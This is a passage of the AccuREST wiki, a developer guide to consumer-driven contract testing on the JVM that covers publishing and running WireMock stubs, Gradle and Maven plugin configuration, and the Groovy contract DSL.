you'll see how to prepare your project to start publishing stubs as JARs and how to use Stub Runner in your tests to run WireMock servers and feed them with stub definitions.\n\n## Publishing stubs as JARs\n\nThe easiest approach would be to centralize the way stubs are kept. 
\n\n### Gradle\n\nAn example of an AccuREST Gradle setup:\n\n[source,groovy,indent=0]\n----\n\tapply plugin: 'maven-publish'\n\n\text {\n\t\t\/\/ kept as a String so that it can be wrapped in a File below\n\t\twiremockStubsOutputDirRoot = \"${project.buildDir}\/production\/${project.name}-stubs\/\"\n\t\twiremockStubsOutputDir = new File(wiremockStubsOutputDirRoot)\n\t}\n\n\taccurest {\n\t\ttargetFramework = 'Spock'\n\t\ttestMode = 'MockMvc'\n\t\tbaseClassForTests = 'com.toomuchcoding.MvcSpec'\n\t\tcontractsDslDir = file(\"${project.projectDir.absolutePath}\/mappings\/\")\n\t\tgeneratedTestSourcesDir = file(\"${project.buildDir}\/generated-sources\/\")\n\t\tstubsOutputDir = wiremockStubsOutputDir\n\t}\n\n\ttask stubsJar(type: Jar, dependsOn: [\"generateWireMockClientStubs\"]) {\n\t baseName = \"${project.name}-stubs\"\n\t from wiremockStubsOutputDirRoot\n\t}\n\n\tartifacts {\n\t archives stubsJar\n\t}\n\n\tpublishing {\n\t publications {\n\t stubs(MavenPublication) {\n\t artifactId \"${project.name}-stubs\"\n\t artifact stubsJar\n\t }\n\t }\n\t}\n----\n\n### Maven\n\nA Maven example can be found in the [AccuREST Maven Plugin README](https:\/\/github.com\/Codearte\/accurest-maven-plugin\/#publishing-wiremock-stubs-projectf-stubsjar)\n\n## Using Stub Runner to automate running stubs\n\nStub Runner automates downloading stubs from a Maven repository (which includes the local Maven repository) and starting a WireMock server for each of those stubs.\n\n### Modules\n\nAccuREST comes with a new structure of modules:\n\n[source,indent=0]\n----\n\u2514\u2500\u2500 stub-runner\n \u251c\u2500\u2500 stub-runner\n \u251c\u2500\u2500 stub-runner-junit\n \u251c\u2500\u2500 stub-runner-spring\n \u2514\u2500\u2500 stub-runner-spring-cloud\n----\n\n#### Stub Runner\n\nContains the core logic of Stub Runner and gives you a main class to run Stub Runner from the command line or from Gradle.\n\nHere you can see a list of options with which you can run Stub Runner:\n\n[source,indent=0]\n----\njava -jar stub-runner.jar [options...]\n -maxp (--maxPort) N : Maximum port value to be assigned to the\n Wiremock instance. Defaults to 15000\n (default: 15000)\n -minp (--minPort) N : Minimal port value to be assigned to the\n Wiremock instance. Defaults to 10000\n (default: 10000)\n -s (--stubs) VAL : Comma separated list of Ivy representation of\n jars with stubs. Eg. groupid:artifactid1,group\n id2:artifactid2:classifier\n -sr (--stubRepositoryRoot) VAL : Location of the server where you\n keep your stubs (e.g. http:\/\/nexus.net\/content\n \/repositories\/repository)\n -ss (--stubsSuffix) VAL : Suffix for the jar containing stubs (e.g.\n 'stubs' if the stub jar would have a 'stubs'\n classifier for stubs: foobar-stubs ).\n Defaults to 'stubs' (default: stubs)\n -wo (--workOffline) : Switch to work offline. Defaults to 'false'\n (default: false)\n----
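\n\nFor instance, a hypothetical invocation (the repository URL and stub coordinates below are placeholders, reused from the examples in this document) could look like this:\n\n[source,indent=0]\n----\njava -jar stub-runner.jar -sr http:\/\/nexus.net\/content\/repositories\/repository -minp 10000 -maxp 10005 -s io.codearte.accurest.stubs:loanIssuance,io.codearte.accurest.stubs:fraudDetectionServer\n----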
\n\nYou can produce a fat jar and run the app as presented above.\n\nYou can also run Stub Runner from Gradle, either by passing the full arguments list with `-Pargs`, like this:\n\n`.\/gradlew stub-runner-root:stub-runner:run -Pargs=\"-c pl -minp 10000 -maxp 10005 -s a:b:c,d:e,f:g:h\"`\n\nor by passing each parameter separately, with a `-P` prefix and without the hyphen (-) in the parameter name:\n\n`.\/gradlew stub-runner-root:stub-runner:run -Pc=pl -Pminp=10000 -Pmaxp=10005 -Ps=a:b:c,d:e,f:g:h`\n\n#### Stub Runner JUnit Rule\n\nStub Runner comes with a JUnit rule that lets you easily download and run stubs for a given group and artifact id:\n\n[source,java,indent=0]\n----\n@ClassRule public static AccurestRule rule = new AccurestRule()\n\t\t\t.repoRoot(\"http:\/\/your.repo.com\")\n\t\t\t.downloadStub(\"io.codearte.accurest.stubs\", \"loanIssuance\")\n\t\t\t.downloadStub(\"io.codearte.accurest.stubs:fraudDetectionServer\")\n\t\t\t.downloadStub(\"io.codearte:stub1\", \"io.codearte:stub2:classifier\", \"io.codearte:stub3\");\n----\n\nOnce that rule gets executed, Stub Runner connects to your Maven repository and, for the given list of dependencies, tries to:\n* download them\n* cache them locally\n* unzip them to a temporary folder\n* start a WireMock server for each Maven dependency on a random port from the provided range of ports\n* feed the WireMock server with all JSON files that are valid WireMock definitions\n\nStub Runner uses the [Groovy's Grape](http:\/\/docs.groovy-lang.org\/latest\/html\/documentation\/grape.html) mechanism to download the Maven dependencies. Check the [docs](http:\/\/docs.groovy-lang.org\/latest\/html\/documentation\/grape.html) for more information.\n\nSince `AccurestRule` implements `StubFinder`, it allows you to find the started stubs:\n\n[source,groovy,indent=0]\n----\ninterface StubFinder {\n\t\/**\n\t * For the given groupId and artifactId tries to find the matching\n\t * URL of the running stub. 
You can also pass only {@code artifactId}.\n\t *\n\t * @param ivyNotation - Ivy representation of the Maven artifact\n\t * @return URL of a running stub or null if not found\n\t *\/\n\tURL findStubUrl(String ivyNotation)\n\n\t\/**\n\t * Returns all running stubs\n\t *\/\n\tRunningStubs findAllRunningStubs()\n}\n----\n\nExample of usage in Spock tests:\n\n[source,groovy,indent=0]\n----\n@ClassRule @Shared AccurestRule rule = new AccurestRule()\n\t\t\t.repoRoot('http:\/\/your.repo.com')\n\t\t\t.downloadStub(\"io.codearte.accurest.stubs\", \"loanIssuance\")\n\t\t\t.downloadStub(\"io.codearte.accurest.stubs:fraudDetectionServer\")\n\n\tdef 'should start WireMock servers'() {\n\t\texpect: 'WireMocks are running'\n\t\t\trule.findStubUrl('io.codearte.accurest.stubs', 'loanIssuance') != null\n\t\t\trule.findStubUrl('loanIssuance') != null\n\t\t\trule.findStubUrl('loanIssuance') == rule.findStubUrl('io.codearte.accurest.stubs', 'loanIssuance')\n\t\t\trule.findStubUrl('io.codearte.accurest.stubs:fraudDetectionServer') != null\n\t\tand:\n\t\t\trule.findAllRunningStubs().isPresent('loanIssuance')\n\t\t\trule.findAllRunningStubs().isPresent('io.codearte.accurest.stubs', 'fraudDetectionServer')\n\t\t\trule.findAllRunningStubs().isPresent('io.codearte.accurest.stubs:fraudDetectionServer')\n\t\tand: 'Stubs were registered'\n\t\t\t\"${rule.findStubUrl('loanIssuance').toString()}\/name\".toURL().text == 'loanIssuance'\n\t\t\t\"${rule.findStubUrl('fraudDetectionServer').toString()}\/name\".toURL().text == 'fraudDetectionServer'\n\t}\n----\n\nExample of usage in JUnit tests:\n\n[source,java,indent=0]\n----\n@ClassRule public static AccurestRule rule = new AccurestRule()\n\t\t\t.repoRoot(\"http:\/\/your.repo.com\")\n\t\t\t.downloadStub(\"io.codearte.accurest.stubs\", \"loanIssuance\")\n\t\t\t.downloadStub(\"io.codearte.accurest.stubs:fraudDetectionServer\");\n\n\t@Test\n\tpublic void should_start_wiremock_servers() throws Exception {\n\t\t\/\/ expect: 'WireMocks are running'\n\t\t\tthen(rule.findStubUrl(\"io.codearte.accurest.stubs\", \"loanIssuance\")).isNotNull();\n\t\t\tthen(rule.findStubUrl(\"loanIssuance\")).isNotNull();\n\t\t\tthen(rule.findStubUrl(\"loanIssuance\")).isEqualTo(rule.findStubUrl(\"io.codearte.accurest.stubs\", \"loanIssuance\"));\n\t\t\tthen(rule.findStubUrl(\"io.codearte.accurest.stubs:fraudDetectionServer\")).isNotNull();\n\t\t\/\/ and:\n\t\t\tthen(rule.findAllRunningStubs().isPresent(\"loanIssuance\")).isTrue();\n\t\t\tthen(rule.findAllRunningStubs().isPresent(\"io.codearte.accurest.stubs\", \"fraudDetectionServer\")).isTrue();\n\t\t\tthen(rule.findAllRunningStubs().isPresent(\"io.codearte.accurest.stubs:fraudDetectionServer\")).isTrue();\n\t\t\/\/ and: 'Stubs were registered'\n\t\t\tthen(httpGet(rule.findStubUrl(\"loanIssuance\").toString() + \"\/name\")).isEqualTo(\"loanIssuance\");\n\t\t\tthen(httpGet(rule.findStubUrl(\"fraudDetectionServer\").toString() + \"\/name\")).isEqualTo(\"fraudDetectionServer\");\n\t}\n----\n\nCheck the *Common properties for JUnit and Spring* for more information on how to apply global configuration of Stub Runner.\n\n#### Stub Runner Spring\n\nIf you're using Spring then you can just import the `io.codearte.accurest.stubrunner.spring.StubRunnerConfiguration` and a bean of type `StubFinder` will get registered.\n\nIn order to find a URL and port of a given dependency you can autowire the bean in your test and call its methods:\n\n[source,groovy,indent=0]\n----\n@ContextConfiguration(classes = Config, loader = SpringApplicationContextLoader)\nclass 
StubRunnerConfigurationSpec extends Specification {\n\n\t@Autowired StubFinder stubFinder\n\n\tdef 'should start WireMock servers'() {\n\t\texpect: 'WireMocks are running'\n\t\t\tstubFinder.findStubUrl('io.codearte.accurest.stubs', 'loanIssuance') != null\n\t\t\tstubFinder.findStubUrl('loanIssuance') != null\n\t\t\tstubFinder.findStubUrl('loanIssuance') == stubFinder.findStubUrl('io.codearte.accurest.stubs', 'loanIssuance')\n\t\t\tstubFinder.findStubUrl('io.codearte.accurest.stubs:fraudDetectionServer') != null\n\t\tand:\n\t\t\tstubFinder.findAllRunningStubs().isPresent('loanIssuance')\n\t\t\tstubFinder.findAllRunningStubs().isPresent('io.codearte.accurest.stubs', 'fraudDetectionServer')\n\t\t\tstubFinder.findAllRunningStubs().isPresent('io.codearte.accurest.stubs:fraudDetectionServer')\n\t\tand: 'Stubs were registered'\n\t\t\t\"${stubFinder.findStubUrl('loanIssuance').toString()}\/name\".toURL().text == 'loanIssuance'\n\t\t\t\"${stubFinder.findStubUrl('fraudDetectionServer').toString()}\/name\".toURL().text == 'fraudDetectionServer'\n\t}\n\n\t@Configuration\n\t@Import(StubRunnerConfiguration)\n\t@EnableAutoConfiguration\n\tstatic class Config {}\n}\n----\n\nCheck the *Common properties for JUnit and Spring* for more information on how to apply global configuration of Stub Runner.\n\n#### Stub Runner Spring Cloud\n\nIf you're using Spring Cloud then it's enough to add `stub-runner-spring-cloud` to the classpath and a bean of type `StubFinder` will be registered automatically.\n\n#### Common properties for JUnit and Spring\n\nSome of the repetitive properties can be set using system properties or property sources (for Spring). Here are their names with their default values:\n\n[width=\"60%\",frame=\"topbot\",options=\"header\"]\n|======================\n| Property name | Default value | Description\n|stubrunner.port.range.min|10000| Minimal value of a port for a started WireMock with stubs\n|stubrunner.port.range.max|15000| Maximum value of a port for a started WireMock with stubs\n|stubrunner.stubs.repository.root|| Maven repo URL. If blank then the local Maven repo will be used\n|stubrunner.stubs.classifier|stubs| Default classifier for the stub artifacts\n|stubrunner.work-offline|false| If true then no remote repositories will be contacted to download stubs\n|stubrunner.stubs|| Comma separated list of Ivy notation of stubs to download\n|======================
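\n\nAs a minimal sketch (assuming a Gradle build; the values below are placeholders), these properties can be passed to every test JVM as system properties:\n\n[source,groovy,indent=0]\n----\n\/\/ build.gradle - pass Stub Runner defaults to the test JVM (values are placeholders)\ntest {\n\tsystemProperty 'stubrunner.stubs.repository.root', 'http:\/\/your.repo.com'\n\tsystemProperty 'stubrunner.stubs.classifier', 'stubs'\n\tsystemProperty 'stubrunner.port.range.min', '12000'\n\tsystemProperty 'stubrunner.port.range.max', '12500'\n}\n----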
\n\n# 9. Migration Guide\n\n## Migration to 0.4.7\n- in 0.4.7 we've fixed the package name (coderate to codearte) so you have to do the same in your projects. This means replacing ```io.coderate.accurest.dsl.GroovyDsl``` with ```io.codearte.accurest.dsl.GroovyDsl```\n\n## Migration to 1.0.0-RC1\n- from 1.0.0 we distinguish ignored contracts from excluded contracts:\n - the `excludedFiles` pattern tells Accurest to skip processing those files at all\n - the `ignoredFiles` pattern tells Accurest to generate contracts and tests, but the tests will be marked as `@Ignore`\n\n- from 1.0.0 the `basePackageForTests` behaviour has changed\n - prior to the change all DSL files had to be under `contractsDslDir`\/`basePackageForTests`\/*subpackage*, resulting in `basePackageForTests`.*subpackage* test package creation\n - now all DSL files have to be under `contractsDslDir`\/*subpackage*, resulting in `basePackageForTests`.*subpackage* test package creation\n - If you don't migrate to the new approach you will have your tests under `contractsDslDir`.`contractsDslDir`.*subpackage*\n\n:github-tag: master\n:github-repo: Codearte\/accurest\n:github-raw: http:\/\/raw.github.com\/{github-repo}\/{github-tag}\n:github-code: http:\/\/github.com\/{github-repo}\/tree\/{github-tag}\n:toc: left\n\nWelcome to the AccuREST Wiki!\n\nPlease follow the Introduction page to start your journey with Consumer Driven Contracts on the JVM\n\n# 1. Introduction\n\nTo make a long story short - AccuREST is a tool that enables Consumer Driven Contract (CDC) development of JVM-based applications. It is shipped with a __REST Contract Definition Language__ (DSL). Contract definitions are used by AccuREST to produce the following resources:\n* JSON stub definitions to be used by Wiremock when doing integration testing on the client code (__client tests__). Test code must still be written by hand, test data is produced by AccuREST.\n* Acceptance tests (in Spock) used to verify if the server-side implementation of the API is compliant with the contract (__server tests__). The full test is generated by AccuREST.\n\nAccuREST moves TDD to the level of software architecture.\n\n# Why?\n\nThe main purposes of AccuREST are:\n\n - to ensure that WireMock stubs (used when developing the client) are doing exactly what the actual server-side implementation will do,\n - to promote the ATDD method and the Microservices architectural style,\n - to provide a way to publish changes in contracts that are immediately visible on both sides,\n - to generate boilerplate test code used on the server side.\n\n# 2. Using in your project\n\n## Prerequisites\n\nIn order to use Accurest with Wiremock you need Wiremock in version at least **2.0.0-beta**. Of course, the higher the better :)\n\n# 2.1. Gradle Project\n\n## Prerequisites\n\nIn order to use Accurest with Wiremock you need Wiremock in version at least **2.0.0-beta**. Of course, the higher the better :)
\n\n## Add gradle plugin\n\n[source,groovy,indent=0]\n----\nbuildscript {\n\trepositories {\n\t\tmavenCentral()\n\t}\n\tdependencies {\n\t\tclasspath 'io.codearte.accurest:accurest-gradle-plugin:0.9.9'\n\t}\n}\n\napply plugin: 'accurest'\n\ndependencies {\n\ttestCompile 'org.spockframework:spock-core:1.0-groovy-2.4'\n\ttestCompile 'com.github.tomakehurst:wiremock:2.0.4-beta' \/\/ you have to use WireMock with 2.0 versions of JsonPath\n\ttestCompile 'com.jayway.restassured:rest-assured:2.4.1'\n\ttestCompile 'com.jayway.restassured:spring-mock-mvc:2.4.1' \/\/ needed if you're going to use Spring MockMvc\n}\n----\n\n## Add maven plugin\n\n[source,xml,indent=0]\n----\n<plugin>\n <groupId>io.codearte.accurest<\/groupId>\n <artifactId>accurest-maven-plugin<\/artifactId>\n <executions>\n <execution>\n <goals>\n <goal>generateStubs<\/goal>\n <goal>generateTests<\/goal> <!-- for JUnit tests; use generateSpecs for a Spock Specification -->\n <\/goals>\n <\/execution>\n <\/executions>\n<\/plugin>\n----\n\n\nRead more: [accurest-maven-plugin](https:\/\/github.com\/Codearte\/accurest-maven-plugin)\n\n## Add stubs\n\nBy default Accurest looks for stubs in the src\/test\/resources\/stubs directory.\nThe directory containing stub definitions is treated as a class name, and each stub definition is treated as a single test.\nWe assume that it contains at least one directory which will be used as the test class name. If there is more than one level of nested directories, all except the last one will be used as the package name.\nSo with the following structure\n\n[source,indent=0]\n----\nsrc\/test\/resources\/stubs\/myservice\/shouldCreateUser.groovy\nsrc\/test\/resources\/stubs\/myservice\/shouldReturnUser.groovy\n----\n\nAccurest will create the test class `defaultBasePackage.MyService` with two methods\n - shouldCreateUser()\n - shouldReturnUser()\n\n## Run plugin\n\nThe plugin registers itself to be invoked before the `compileTestGroovy` task. You have nothing to do as long as you want it to be part of your build process. If you just want to generate the tests, invoke the `generateAccurest` task.\n\n## Configure plugin\n\nTo change the default configuration just add an `accurest` snippet to your Gradle config\n\n[source,groovy,indent=0]\n----\naccurest {\n\ttestMode = 'MockMvc'\n\tbaseClassForTests = 'org.mycompany.tests'\n\tgeneratedTestSourcesDir = project.file('src\/accurest')\n}\n----\n\n### Configuration options\n\n - **testMode** - defines the mode for acceptance tests. By default MockMvc, which is based on Spring's MockMvc. It can also be changed to **JaxRsClient** or to **Explicit** for real HTTP calls.\n - **imports** - array with imports that should be included in generated tests (for example ['org.myorg.Matchers']). By default an empty array []\n - **staticImports** - array with static imports that should be included in generated tests (for example ['org.myorg.Matchers.*']). By default an empty array []\n - **basePackageForTests** - specifies the base package for all generated tests. By default set to io.codearte.accurest.tests\n - **baseClassForTests** - base class for generated tests. By default `spock.lang.Specification`\n - **ruleClassForTests** - specifies a Rule which should be added to the generated test classes.\n - **ignoredFiles** - Ant matcher allowing defining stub files for which processing should be skipped. By default an empty array []\n - **contractsDslDir** - directory containing contracts written using the GroovyDSL. By default `$rootDir\/src\/test\/accurest`\n - **generatedTestSourcesDir** - test source directory where tests generated from the Groovy DSL should be placed. By default `$buildDir\/generated-test-sources\/accurest`\n - **stubsOutputDir** - dir where the generated Wiremock stubs from the Groovy DSL should be placed\n - **targetFramework** - the target test framework to be used; currently Spock and JUnit are supported, with Spock being the default framework
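\n\nFor illustration, here is a sketch combining several of the options above (all class, package and directory names below are placeholders):\n\n[source,groovy,indent=0]\n----\naccurest {\n\ttestMode = 'Explicit'\n\ttargetFramework = 'JUnit'\n\tbasePackageForTests = 'org.mycompany.contracts'\n\tbaseClassForTests = 'org.mycompany.tests.BaseAccurestSpec'\n\tignoredFiles = ['**\/inProgress\/**']\n\tcontractsDslDir = file(\"${project.rootDir}\/src\/test\/accurest\")\n\tgeneratedTestSourcesDir = file(\"${project.buildDir}\/generated-test-sources\/accurest\")\n\tstubsOutputDir = file(\"${project.buildDir}\/production\/${project.name}-stubs\")\n}\n----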
\n\n## Base class for tests\n\nWhen using Accurest in the default MockMvc mode you need to create a base specification for all generated acceptance tests. In this class you need to point to the endpoint that should be verified.\n\n[source,groovy,indent=0]\n----\npackage org.mycompany.tests\n\nimport org.mycompany.ExampleSpringController\nimport com.jayway.restassured.module.mockmvc.RestAssuredMockMvc\nimport spock.lang.Specification\n\nclass MvcSpec extends Specification {\n def setup() {\n RestAssuredMockMvc.standaloneSetup(new ExampleSpringController())\n }\n}\n----\n\nWhen using `Explicit` mode, you can use the base class to initialize the whole tested app, similarly to regular integration tests. When using `JAXRSCLIENT` mode, this base class should also contain a `protected WebTarget webTarget` field; right now the only way to test a JAX-RS API is to start a web server.\n\n## Invoking generated tests\n\nTo ensure that the provider side is compliant with the defined contracts, you need to invoke:\n`.\/gradlew generateAccurest test`\n\n## Accurest on consumer side\n\nIn the consumer service you need to configure the Accurest plugin in exactly the same way as for the provider. You need to copy the contracts stored in src\/test\/resources\/stubs and generate the Wiremock JSON stubs using the `.\/gradlew generateWireMockClientStubs` command. Note that the `stubsOutputDir` option has to be set for stub generation to work.\n\nWhen present, the JSON stubs can be used in automated consumer tests.\n\n[source,groovy,indent=0]\n----\n@ContextConfiguration(loader = SpringApplicationContextLoader, classes = Application)\nclass LoanApplicationServiceSpec extends Specification {\n\n @ClassRule\n @Shared\n WireMockClassRule wireMockRule = new WireMockClassRule()\n\n @Autowired\n LoanApplicationService sut\n\n def 'should successfully apply for loan'() {\n given:\n \tLoanApplication application =\n\t\t\tnew LoanApplication(client: new Client(pesel: '12345678901'), amount: 123.123)\n when:\n\tLoanApplicationResult loanApplication = sut.loanApplication(application)\n then:\n\tloanApplication.loanApplicationStatus == LoanApplicationStatus.LOAN_APPLIED\n\tloanApplication.rejectionReason == null\n }\n}\n----\n\nUnderneath, LoanApplication makes a call to the FraudDetection service. This request is handled by a Wiremock server configured using stubs generated by Accurest.
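\n\nHow the generated JSON stubs reach the `WireMockClassRule` above depends on your setup. As a minimal sketch (assuming the generated stub mappings were copied under `src\/test\/resources\/wiremock\/mappings` - the path is a placeholder, adjust it to your build), you could point the rule at that directory explicitly:\n\n[source,groovy,indent=0]\n----\nimport com.github.tomakehurst.wiremock.core.WireMockConfiguration\nimport com.github.tomakehurst.wiremock.junit.WireMockClassRule\n\n\/\/ WireMock reads its JSON stub definitions from the 'mappings' subfolder of the given root\n@ClassRule\n@Shared\nWireMockClassRule wireMockRule = new WireMockClassRule(\n\t\tWireMockConfiguration.wireMockConfig().usingFilesUnderDirectory('src\/test\/resources\/wiremock'))\n----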
\n\n# 2.2. Using in your Maven project\n\n## Add maven plugin\n\n[source,xml,indent=0]\n----\n<plugin>\n <groupId>io.codearte.accurest<\/groupId>\n <artifactId>accurest-maven-plugin<\/artifactId>\n <executions>\n <execution>\n <goals>\n <goal>convert<\/goal>\n <goal>generateStubs<\/goal>\n <goal>generateTests<\/goal>\n <\/goals>\n <\/execution>\n <\/executions>\n<\/plugin>\n----\n\nRead more: [accurest-maven-plugin](https:\/\/github.com\/Codearte\/accurest-maven-plugin)\n\n## Add stubs\n\nBy default Accurest looks for stubs in the `src\/test\/accurest` directory.\nThe directory containing stub definitions is treated as a class name, and each stub definition is treated as a single test.\nWe assume that it contains at least one directory which will be used as the test class name. If there is more than one level of nested directories, all except the last one will be used as the package name.\nSo with the following structure\n\n[source,groovy,indent=0]\n----\nsrc\/test\/accurest\/myservice\/shouldCreateUser.groovy\nsrc\/test\/accurest\/myservice\/shouldReturnUser.groovy\n----\n\nAccurest will create the test class `defaultBasePackage.MyService` with two methods\n - `shouldCreateUser()`\n - `shouldReturnUser()`\n\n## Run plugin\n\nThe plugin goal `generateTests` is bound to the `generate-test-sources` phase. You have nothing to do as long as you want it to be part of your build process. If you just want to generate the tests, invoke the `generateTests` goal.\n\n## Configure plugin\n\nTo change the default configuration just add a `configuration` section to the plugin definition or the `execution` definition.\n\n[source,xml,indent=0]\n----\n<plugin>\n <groupId>io.codearte.accurest<\/groupId>\n <artifactId>accurest-maven-plugin<\/artifactId>\n <executions>\n <execution>\n <goals>\n <goal>convert<\/goal>\n <goal>generateStubs<\/goal>\n <goal>generateTests<\/goal>\n <\/goals>\n <\/execution>\n <\/executions>\n <configuration>\n <basePackageForTests>com.ofg.twitter.place<\/basePackageForTests>\n <baseClassForTests>com.ofg.twitter.place.BaseMockMvcSpec<\/baseClassForTests>\n <\/configuration>\n<\/plugin>\n----\n\n### Configuration options\n\n - **testMode** - defines the mode for acceptance tests. By default `MockMvc`, which is based on Spring's MockMvc. It can also be changed to `JaxRsClient` or to `Explicit` for real HTTP calls.\n - **basePackageForTests** - specifies the base package for all generated tests. By default set to `io.codearte.accurest.tests`.\n - **ruleClassForTests** - specifies a Rule which should be added to the generated test classes.\n - **baseClassForTests** - base class for generated tests. By default `spock.lang.Specification`.\n - **contractsDir** - directory containing contracts written using the GroovyDSL. By default `\/src\/test\/accurest`.\n - **generatedTestSourcesDir** - test source directory where tests generated from the Groovy DSL should be placed. By default `target\/generated-test-sources\/accurest`.\n - **mappingsDir** - dir where the generated Wiremock stubs from the Groovy DSL should be placed.\n - **testFramework** - the target test framework to be used; currently Spock and JUnit are supported, with Spock being the default framework
\n\n## Base class for tests\n\nWhen using Accurest in the default MockMvc mode you need to create a base specification for all generated acceptance tests. In this class you need to point to the endpoint that should be verified.\n\n[source,groovy,indent=0]\n----\npackage org.mycompany.tests\n\nimport org.mycompany.ExampleSpringController\nimport com.jayway.restassured.module.mockmvc.RestAssuredMockMvc\nimport spock.lang.Specification\n\nclass MvcSpec extends Specification {\n def setup() {\n RestAssuredMockMvc.standaloneSetup(new ExampleSpringController())\n }\n}\n----\n\nWhen using `Explicit` mode, you can use the base class to initialize the whole tested app, similarly to regular integration tests. When using `JAXRSCLIENT` mode, this base class should also contain a `protected WebTarget webTarget` field; right now the only way to test a JAX-RS API is to start a web server.\n\n## Invoking generated tests\n\nThe Accurest Maven Plugin generates verification code into the directory `\/generated-test-sources\/accurest` and attaches this directory to the `testCompile` goal.\n\nFor Groovy Spock code use:\n\n[source,xml,indent=0]\n----\n<plugin>\n\t<groupId>org.codehaus.gmavenplus<\/groupId>\n\t<artifactId>gmavenplus-plugin<\/artifactId>\n\t<version>1.5<\/version>\n\t<executions>\n\t\t<execution>\n\t\t\t<goals>\n\t\t\t\t<goal>testCompile<\/goal>\n\t\t\t<\/goals>\n\t\t<\/execution>\n\t<\/executions>\n\t<configuration>\n\t\t<testSources>\n\t\t\t<testSource>\n\t\t\t\t<directory>${project.basedir}\/src\/test\/groovy<\/directory>\n\t\t\t\t<includes>\n\t\t\t\t\t<include>**\/*.groovy<\/include>\n\t\t\t\t<\/includes>\n\t\t\t<\/testSource>\n\t\t\t<testSource>\n\t\t\t\t<directory>${project.build.directory}\/generated-test-sources\/accurest<\/directory>\n\t\t\t\t<includes>\n\t\t\t\t\t<include>**\/*.groovy<\/include>\n\t\t\t\t<\/includes>\n\t\t\t<\/testSource>\n\t\t<\/testSources>\n\t<\/configuration>\n<\/plugin>\n----\n\nTo ensure that the provider side is compliant with the defined contracts, you need to invoke `mvn generateTests test`\n\n## Accurest on consumer side\n\nIn the consumer service you need to configure the Accurest plugin in exactly the same way as for the provider. You need to copy the contracts stored in `src\/test\/accurest` and generate the Wiremock JSON stubs using the `mvn generateStubs` command. By default the generated WireMock mappings are stored in the directory `target\/mappings`. 
Your project should create an additional artifact with the `stubs` classifier from these generated mappings, for easy deployment to a Maven repository.\n\nSample configuration:\n\n[source,xml,indent=0]\n----\n<plugin>\n <groupId>io.codearte.accurest<\/groupId>\n <artifactId>accurest-maven-plugin<\/artifactId>\n <version>${accurest.version}<\/version>\n <executions>\n <execution>\n <goals>\n <goal>convert<\/goal>\n <goal>generateStubs<\/goal>\n <\/goals>\n <\/execution>\n <\/executions>\n<\/plugin>\n----\n\nWhen present, the JSON stubs can be used in automated consumer tests.\n\n[source,groovy,indent=0]\n----\n@ContextConfiguration(loader = SpringApplicationContextLoader, classes = Application)\nclass LoanApplicationServiceSpec extends Specification {\n\n @ClassRule\n @Shared\n WireMockClassRule wireMockRule = new WireMockClassRule()\n\n @Autowired\n LoanApplicationService sut\n\n def 'should successfully apply for loan'() {\n given:\n \tLoanApplication application =\n\t\t\tnew LoanApplication(client: new Client(pesel: '12345678901'), amount: 123.123)\n when:\n\tLoanApplicationResult loanApplication = sut.loanApplication(application)\n then:\n\tloanApplication.loanApplicationStatus == LoanApplicationStatus.LOAN_APPLIED\n\tloanApplication.rejectionReason == null\n }\n}\n----\n\nUnderneath, LoanApplication makes a call to the FraudDetection service. This request is handled by a Wiremock server configured using stubs generated by Accurest.\n\n# 3. Contract DSL\n\nThe Contract DSL in AccuREST is written in Groovy, but don't be alarmed if you haven't used Groovy before. Knowledge of the language is not really needed, as our DSL uses only a tiny subset of it (namely literals, method calls and closures). What's more, AccuREST's DSL is designed to be programmer-readable without any knowledge of the DSL itself.\n\nLet's look at a full example of a contract definition.\n\n[source,groovy,indent=0]\n----\nio.codearte.accurest.dsl.GroovyDsl.make {\n request {\n method 'POST'\n urlPath('\/users') {\n queryParameters {\n parameter 'limit': 100\n parameter 'offset': containing(\"1\")\n parameter 'filter': \"email\"\n }\n }\n headers {\n header 'Content-Type': 'application\/json'\n }\n body '''{ \"login\" : \"john\", \"name\": \"John The Contract\" }'''\n }\n response {\n status 200\n headers {\n header 'Location': '\/users\/john'\n }\n }\n}\n----\n\nNot all features of the DSL are used in the example above. If you didn't find what you are looking for, please check the next paragraphs on this page.\n\n> You can easily compile Accurest Contracts to WireMock stub mappings using the standalone maven command: `mvn io.codearte.accurest:accurest-maven-plugin:convert`.\n\n## Top-Level Elements\n\nThe following methods can be called in the top-level closure of a contract definition. Request and response are mandatory, priority is optional.\n\n[source,groovy,indent=0]\n----\nio.codearte.accurest.dsl.GroovyDsl.make {\n \/\/ Definition of HTTP request part of the contract\n \/\/ (this can be a valid request or invalid depending\n \/\/ on type of contract being specified).\n request {\n ...\n }\n\n \/\/ Definition of HTTP response part of the contract\n \/\/ (a service implementing this contract should respond\n \/\/ with following response after receiving request\n \/\/ specified in \"request\" part above).\n response {\n ...\n }\n\n \/\/ Contract priority, which can be used for overriding\n \/\/ contracts (1 is highest). Priority is optional.\n priority 1\n}\n----
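\n\nTo illustrate how `priority` can be used, here is a sketch of two contracts where a more specific contract overrides a catch-all one (the paths and statuses are purely illustrative):\n\n[source,groovy,indent=0]\n----\n\/\/ contract 1 - specific; wins because 1 is the highest priority\nio.codearte.accurest.dsl.GroovyDsl.make {\n priority 1\n request {\n method 'GET'\n urlPath('\/users\/admin')\n }\n response {\n status 200\n }\n}\n\n\/\/ contract 2 - catch-all for any other two-digit user id\nio.codearte.accurest.dsl.GroovyDsl.make {\n priority 2\n request {\n method 'GET'\n url $(client(regex('\/users\/[0-9]{2}')), server('\/users\/12'))\n }\n response {\n status 404\n }\n}\n----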
\n\n## Request\n\nThe HTTP protocol requires only a **method and an address** to be specified in a request. The same information is mandatory in the request definition of an AccuREST contract.\n\n[source,groovy,indent=0]\n----\nio.codearte.accurest.dsl.GroovyDsl.make {\n request {\n \/\/ HTTP request method (GET\/POST\/PUT\/DELETE).\n method 'GET'\n\n \/\/ Path component of request URL is specified as follows.\n urlPath('\/users')\n }\n\n response {\n ...\n }\n}\n----\n\nIt is possible to specify the whole `url` instead of just the path, but `urlPath` is the recommended way as it makes the tests **host-independent**.\n\n[source,groovy,indent=0]\n----\nio.codearte.accurest.dsl.GroovyDsl.make {\n request {\n method 'GET'\n\n \/\/ Specifying `url` and `urlPath` in one contract is illegal.\n url('http:\/\/localhost:8888\/users')\n }\n\n response {\n ...\n }\n}\n----\n\nA request may contain **query parameters**, which are specified in a closure nested in a call to `urlPath` or `url`.\n\n[source,groovy,indent=0]\n----\nio.codearte.accurest.dsl.GroovyDsl.make {\n request {\n ...\n\n urlPath('\/users') {\n\n \/\/ Each parameter is specified in form\n \/\/ `'paramName' : paramValue` where parameter value\n \/\/ may be a simple literal or one of matcher functions,\n \/\/ all of which are used in this example.\n queryParameters {\n\n \/\/ If a simple literal is used as value\n 